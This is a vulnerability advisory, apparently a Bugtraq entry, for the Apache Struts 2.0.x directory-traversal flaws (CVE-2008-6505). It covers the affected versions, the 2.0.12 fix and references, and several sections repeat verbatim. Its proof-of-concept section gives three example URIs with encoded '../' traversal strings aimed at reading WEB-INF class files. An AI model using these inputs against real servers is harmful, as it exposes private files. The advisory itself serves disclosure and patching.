Struts Multiple Directory Traversal Vulnerabilities
BID:32104
Info
Struts Multiple Directory Traversal Vulnerabilities
| Bugtraq ID: | 32104 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6505 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2008 12:00AM |
| Updated: | Apr 16 2015 05:52PM |
| Credit: | Csaba Barta and László Tóth, PricewaterhouseCoopers |
| Vulnerable: |
VMWare vCenter Orchestrator 4.1 VMWare vCenter Orchestrator 4.0 Apache Software Foundation Struts 2.0.11 .2 Apache Software Foundation Struts 2.0.9 Apache Software Foundation Struts 2.0.8 Apache Software Foundation Struts 2.0.7 Apache Software Foundation Struts 2.0.6 Apache Software Foundation Struts 2.0.5 Apache Software Foundation Struts 2.0.4 Apache Software Foundation Struts 2.0.3 Apache Software Foundation Struts 2.0.2 Apache Software Foundation Struts 2.0.1 Apache Software Foundation Struts 2.0 |
| Not Vulnerable: |
Apache Software Foundation Struts 2.0.12 |
Discussion
Struts Multiple Directory Traversal Vulnerabilities
Struts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.
Versions prior to Struts 2.0.12 are vulnerable.
Struts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.
Versions prior to Struts 2.0.12 are vulnerable.
Exploit / POC
Struts Multiple Directory Traversal Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com:8080/struts2-blank-2.0.11.1/struts..
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com:8080/struts2-blank-2.0.11.1/struts..
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/
Solution / Fix
Struts Multiple Directory Traversal Vulnerabilities
Solution:
The vendor has released Struts 2.0.12 to address these issues. Please see the references for more information.
Apache Software Foundation Struts 2.0
Apache Software Foundation Struts 2.0.1
Apache Software Foundation Struts 2.0.11 .2
Apache Software Foundation Struts 2.0.2
Apache Software Foundation Struts 2.0.3
Apache Software Foundation Struts 2.0.4
Apache Software Foundation Struts 2.0.5
Apache Software Foundation Struts 2.0.6
Apache Software Foundation Struts 2.0.7
Apache Software Foundation Struts 2.0.8
Apache Software Foundation Struts 2.0.9
Solution:
The vendor has released Struts 2.0.12 to address these issues. Please see the references for more information.
Apache Software Foundation Struts 2.0
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.1
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.11 .2
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.2
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.3
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.4
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.5
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.6
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.7
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.8
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
Apache Software Foundation Struts 2.0.9
-
Apache Software Foundation struts-2.0.12-all.zip
http://people.apache.org/builds/struts/2.0.12/struts-2.0.12-all.zip
References
Struts Multiple Directory Traversal Vulnerabilities
References:
References:
- Struts Homepage (Apache Software Foundation)
- S2-004 Directory traversal vulnerability while serving static content (Apache Software Foundation)